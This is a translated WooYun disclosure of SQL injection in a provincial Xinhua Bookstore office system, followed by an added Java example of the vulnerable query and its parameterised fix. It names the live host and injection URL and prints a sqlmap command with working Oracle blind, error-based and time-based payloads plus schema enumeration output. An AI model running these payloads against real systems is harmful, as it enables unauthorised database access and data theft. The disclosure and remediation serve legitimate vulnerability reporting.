Vulnerability summary

Defect ID: wooyun-2014-069632

Title: SQL injection in the OA system of a province's entire Xinhua Bookstore network (Oracle database)

Related vendor: 新华书店 (Xinhua Bookstore)

Author: scanf

Submitted: 2014-07-25 11:51

Fix deadline: 2014-09-08 11:52

Published: 2014-09-08 11:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-07-25: Details sent to the vendor; awaiting vendor handling
2014-07-30: Vendor confirmed; details visible to the vendor only
2014-08-09: Details opened to core white hats and relevant domain experts
2014-08-19: Details opened to regular white hats
2014-08-29: Details opened to intern white hats
2014-09-08: Details opened to the public

Brief description:

Xinhua Bookstore! So many locations, the whole province! Feels awesome; will this make the front page?

Detailed description:

[Screenshot: QQ截图20140725072534.png]


Site

<option value = "anji">安吉县店</option>

<option value = "b2b">博库批发</option>

<option value = "b2g">博库大客户</option>

<option value = "beilun">北仑区书店</option>

<option value = "bkgc">博库馆藏</option>

<option value = "bookuu">集团公司频道</option>

<option value = "cangnan">苍南县店</option>

<option value = "changshan">常山县店</option>

<option value = "changxing">长兴县店</option>

<option value = "chunan">淳安县店</option>

<option value = "cixi">慈溪市店</option>

<option value = "daishan">岱山县店</option>

<option value = "deqing">德清县店</option>

<option value = "dongyang">东阳市店</option>

<option value = "fenghua">奉化市店</option>

<option value = "fttest">繁体网站测试</option>

<option value = "fuyang">富阳市店</option>

<option value = "ghs">供货商</option>

<option value = "group">集团门户</option>

<option value = "haining">海宁市店</option>

<option value = "haiyan">海盐县店</option>

<option value = "hangzhou">杭州市店</option>

<option value = "huzhou">湖州市店</option>

<option value = "jiande">建德市店</option>

<option value = "jiangshan">江山市店</option>

<option value = "jiashan">嘉善县店</option>

<option value = "jiaxing">嘉兴市店</option>

<option value = "jingning">景宁县店</option>

<option value = "jinhua">金华市店</option>

<option value = "jinyun">缙云县店</option>

<option value = "kaihua">开化县店</option>

<option value = "kfbook">三毛书城</option>

<option value = "lanxi">兰溪市店</option>

<option value = "linan">临安市店</option>

<option value = "linhai">临海市店</option>

<option value = "lishui">丽水市店</option>

<option value = "longgang">深圳龙岗书城</option>

<option value = "longquan">龙泉县店</option>

<option value = "longyou">龙游县店</option>

<option value = "meiguo">美国</option>

<option value = "meiguokgsm">美国可供书目</option>

<option value = "ningbo">宁波市店</option>

<option value = "ninghai">宁海县店</option>

<option value = "panan">磐安县店</option>

<option value = "peixun">演示网站</option>

<option value = "pinghu">平湖市店</option>

<option value = "pingyang">平阳县店</option>

<option value = "pujiang">浦江县店</option>

<option value = "putuo">普陀新华书店</option>

<option value = "qingtian">青田县店</option>

<option value = "qingyuan">庆元县店</option>

<option value = "quzhou">衢州市店</option>

<option value = "qz">泉州书城</option>

<option value = "ruian">瑞安市店</option>

<option value = "sanmen">三门县店</option>

<option value = "shanghainew">上海博库新站</option>

<option value = "shangyu">上虞市店</option>

<option value = "shaoxing">绍兴市店</option>

<option value = "shaoxingxian">绍兴县店</option>

<option value = "shengzhou">嵊州市新华书店</option>

<option value = "songyang">松阳县店</option>

<option value = "suichang">遂昌县店</option>

<option value = "taishun">泰顺县店</option>

<option value = "taiwan">台湾天龙</option>

<option value = "taiyuan">太原市店</option>

<option value = "taizhou">台州市店</option>

<option value = "tiantai">天台县店</option>

<option value = "tonglu">桐庐县店</option>

<option value = "tongxiang">桐乡市店</option>

<option value = "tzsc">台州书城</option>

<option value = "wencheng">文成县店</option>

<option value = "wenling">温岭市店</option>

<option value = "wenzhou">温州市店</option>

<option value = "wqnew">网群新站点</option>

<option value = "wuyi">武义县店</option>

<option value = "xiangshan">象山县店</option>

<option value = "xianju">仙居县店</option>

<option value = "xiaoshan">萧山市店</option>

<option value = "xinchang">新昌县店</option>

<option value = "xuzhou">徐州博库</option>

<option value = "yinzhou">鄞州区店</option>

<option value = "yiwu">浙义乌市店</option>

<option value = "yongjia">永嘉县店</option>

<option value = "yongkang">永康市店</option>

<option value = "yueqing">乐清市店</option>

<option value = "yuhang">余杭新华书店</option>

<option value = "yuhuan">玉环县店</option>

<option value = "yunhe">云和县店</option>

<option value = "yuyao">余姚市店</option>

<option value = "zhenhai">镇海区书店</option>

<option value = "zhoushan">舟山市店</option>

<option value = "zhuji">诸暨书城</option>


All of those locations, and in addition:

[Screenshot: QQ截图20140725072609.png]

[Screenshot: QQ截图20140725072635.png]

The data for all of them sits in a single database.

Proof of vulnerability:

Injection point: http://60.191.110.113/debug/detail.jsp?detailid=200504201215498043487091470000000010

[wooyun@scanf~]# Sqlmap -u "http://60.191.110.113/debug/detail.jsp?detailid=200504201215498043487091470000000010" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 07:27:39
[07:27:39] [INFO] resuming back-end DBMS 'oracle'
[07:27:39] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: detailid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: detailid=200504201215498043487091470000000010 AND 4338=4338
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: detailid=200504201215498043487091470000000010 AND 1064=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(108)||CHR(108)||CHR(113)||(SELECT (CASE WHEN (1064=1064) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(121)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: detailid=200504201215498043487091470000000010 AND 2045=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
[07:27:40] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[07:27:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[07:27:40] [INFO] fetching database (schema) names
[07:27:40] [INFO] the SQL query used returns 10 entries
[07:27:40] [INFO] resumed: CTXSYS
[07:27:40] [INFO] resumed: EXFSYS
[07:27:40] [INFO] resumed: MDSYS
[07:27:40] [INFO] resumed: OA
[07:27:40] [INFO] resumed: OLAPSYS
[07:27:40] [INFO] resumed: PUBLISH
[07:27:40] [INFO] resumed: SYS
[07:27:40] [INFO] resumed: SYSTEM
[07:27:40] [INFO] resumed: WORKFLOWENGINE
[07:27:40] [INFO] resumed: XINHUA
available databases [10]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OA
[*] OLAPSYS
[*] PUBLISH
[*] SYS
[*] SYSTEM
[*] WORKFLOWENGINE
[*] XINHUA
[07:27:40] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\60.191.110.113'
[*] shutting down at 07:27:40


[Screenshot: QQ截图20140725075330.png]

There is far too much here; I won't waste any more time on it.

Fix recommendation:

I didn't dig any deeper, but an old OA system like this is overdue for an upgrade.
If you keep running it, patch every one of these holes; better still, replace it.
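The sqlmap findings above all share one root cause: the detailid request parameter is placed directly into the SQL text, so Oracle evaluates whatever expression follows it. The following Java is an added example written for this page; it is not code from the original report or from the affected OA system. It puts the vulnerable query-building pattern beside the fixed version that uses a bind variable, with a strict format check in front of it. The table name OA_DETAIL, the column names, and the assumed digit-only format of detailid are assumptions, not facts taken from the target.

```java
// Added example (not from the original report or the affected OA system):
// the concatenation pattern behind the reported injection, and the fix.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

public class DetailLookup {

    // The detailid values on the page are long digit strings. Assumed format:
    // digits only, bounded length. Anything else is refused before it reaches SQL.
    private static final Pattern DETAIL_ID = Pattern.compile("\\d{1,40}");

    public static boolean isValidDetailId(String detailId) {
        return detailId != null && DETAIL_ID.matcher(detailId).matches();
    }

    // BEFORE (vulnerable): the parameter becomes part of the statement text.
    // A value like "...0010 AND 4338=4338" is parsed by Oracle as part of the
    // WHERE clause, which is what the boolean-, error- and time-based findings
    // in the sqlmap output rely on. Kept only to show the defect.
    static String buildQueryUnsafe(String detailId) {
        return "SELECT TITLE, CONTENT FROM OA_DETAIL WHERE DETAILID = " + detailId;
    }

    // AFTER (fixed): the statement text is constant and the value travels as a
    // bind variable, so the database never interprets it as SQL. The format
    // check runs first so malformed ids are rejected (and can be logged) instead
    // of reaching the query at all.
    public static String fetchTitle(Connection conn, String detailId) throws SQLException {
        if (!isValidDetailId(detailId)) {
            throw new IllegalArgumentException("rejected detailid");
        }
        String sql = "SELECT TITLE FROM OA_DETAIL WHERE DETAILID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, detailId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("TITLE") : null;
            }
        }
    }

    // Offline demonstration of the validation layer on constructed inputs,
    // including the shape of the boolean-based probe shown above. No database
    // connection is needed for this part.
    public static void main(String[] args) {
        String[] inputs = {
            "200504201215498043487091470000000010",
            "200504201215498043487091470000000010 AND 4338=4338",
            "1 OR 1=1",
            ""
        };
        for (String in : inputs) {
            System.out.println((isValidDetailId(in) ? "accept " : "reject ") + "[" + in + "]");
        }
    }
}
```

The bind variable is the fix; the regex is defence in depth, not a substitute for it. Since the report states that every store's data lives in one database, the account the web application connects with should also be limited to the OA schema it actually needs, so that a future injection elsewhere in the application cannot read the other schemas that sqlmap enumerated above.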

Copyright notice: please credit the source when reposting: scanf@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-07-30 09:02

Vendor reply:

CNVD confirmed and reproduced the described situation and forwarded it through CNCERT to the Zhejiang branch, which will follow up with the organization that administers the site.

Latest status:

None yet